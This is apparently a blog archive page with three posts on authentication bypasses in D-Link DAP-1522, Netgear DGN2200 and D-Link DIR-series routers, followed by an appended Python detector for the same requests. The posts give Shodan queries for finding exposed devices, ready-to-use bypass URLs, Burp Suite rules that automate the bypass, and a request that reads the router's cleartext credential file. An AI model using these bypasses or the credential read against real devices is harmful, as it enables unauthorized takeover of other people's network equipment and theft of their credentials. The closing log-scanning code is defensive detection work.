Showing posts from July, 2021

CVE-2020-15896 Authentication Bypass D-Link DAP-1522 Wireless N Dualband Access Point

Introduction

CVE-2020-15896 is an authentication bypass vulnerability in the D-Link DAP-1522 Wireless N Dualband Access Point with firmware version 1.4x.

Device Identification

Identify vulnerable devices using the following Shodan query:

DAP-1522 Ver 1.4?

Authentication Bypass

View the web pages of the router by appending ?NO_NEED_AUTH=1&AUTH_GROUP=0 to every URL, as given below:

http://deviceIP/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0
http://deviceIP/adv_acl.php?NO_NEED_AUTH=1&AUTH_GROUP=0
http://deviceIP/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0

Automation Using Burp Suite Proxy Match and Replace

In Burp Suite, in the Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1 " with " ?NO_NEED_AUTH=1&AUTH_GROUP=0 HTTP1.1 ".

From now on, ?NO_NEED_AUTH=1&AUTH_GROUP=0 is automatically appended to every request made from the browser.

Authentication Bypass - Netgear DGN2200 N300 Wireless ADSL2+ Modem Router

Introduction

An authentication bypass vulnerability exists in the Netgear DGN2200 N300 Wireless ADSL2+ Modem Router version v1.

Device Identification

Identify vulnerable devices from the results of the following Shodan search query:

netgear dgn2200

Authentication Bypass

View the web pages of the router without any credentials by appending ?test.gif to every URL, as given below:

http://deviceIP:port/RST_status.htm?test.gif
http://deviceIP:port/BAS_pppoa.htm?test.gif
http://deviceIP:port/WAN_wan.htm?test.gif

Automation Using Burp Suite Proxy Match and Replace

In Burp Suite, in the Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1 " with " ?test.gif HTTP1.1 ".

From now on, ?test.gif is automatically appended to every request made from the browser.

CVE-2017-12943 D-Link DIR Series Authentication Bypass

Introduction

Log in to vulnerable DIR series routers (e.g. DIR-600) by viewing cleartext credentials.

Device Identification

Identify vulnerable devices from the results of the following Shodan query:

http.favicon.hash:1037387972 Mathopd/1.5p6

View Credentials

View the content of the /var/etc/httpasswd file by appending the following to the router web login page URL:

/model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

Log in to the router using the credentials displayed on the left side of the page.
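Detection for the three bypass requests described in the posts above, as an added example that is not part of the original posts: it scans HTTP access logs from a proxy or sensor in front of device management interfaces and flags requests carrying NO_NEED_AUTH, ?test.gif on an .htm page, or REQUIRE_FILE on __show_info.php. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP[^"]*"')

def classify(target):
    """Name the bypass pattern from this page that a request target matches, or None."""
    url = urlsplit(target)
    # parse_qs percent-decodes; keep_blank_values keeps bare keys such as "test.gif".
    params = parse_qs(url.query, keep_blank_values=True)
    if "NO_NEED_AUTH" in params:
        return "CVE-2020-15896"
    if url.path.lower().endswith(".htm") and "test.gif" in params:
        return "DGN2200 ?test.gif"
    if url.path.endswith("/model/__show_info.php") and "REQUIRE_FILE" in params:
        return "CVE-2017-12943"
    return None

def scan(lines):
    """Return (source address, request target, finding) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not an HTTP request line in the assumed format
        finding = classify(m.group("target"))
        if finding:
            hits.append((m.group("src"), m.group("target"), finding))
    return hits

# Constructed sample log lines (documentation address ranges), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2021:10:01:02 +0000] "GET /st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [12/Jul/2021:10:02:11 +0000] "GET /RST_status.htm?test.gif HTTP/1.1" 200 8841',
    '198.51.100.23 - - [12/Jul/2021:10:02:40 +0000] "GET /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd HTTP/1.1" 200 312',
    '192.0.2.10 - - [12/Jul/2021:10:03:05 +0000] "GET /st_device.php HTTP/1.1" 401 0',
    '192.0.2.10 - - [12/Jul/2021:10:03:06 +0000] "GET /images/test.gif HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, target, finding in scan(SAMPLE_LOG):
        print(f"{finding:18} {src:15} {target}")
```

A 200 response to a flagged request that should have required a login is the signal worth triaging first; the ordinary fetch of /images/test.gif is not flagged because the filename is in the path, not the query string.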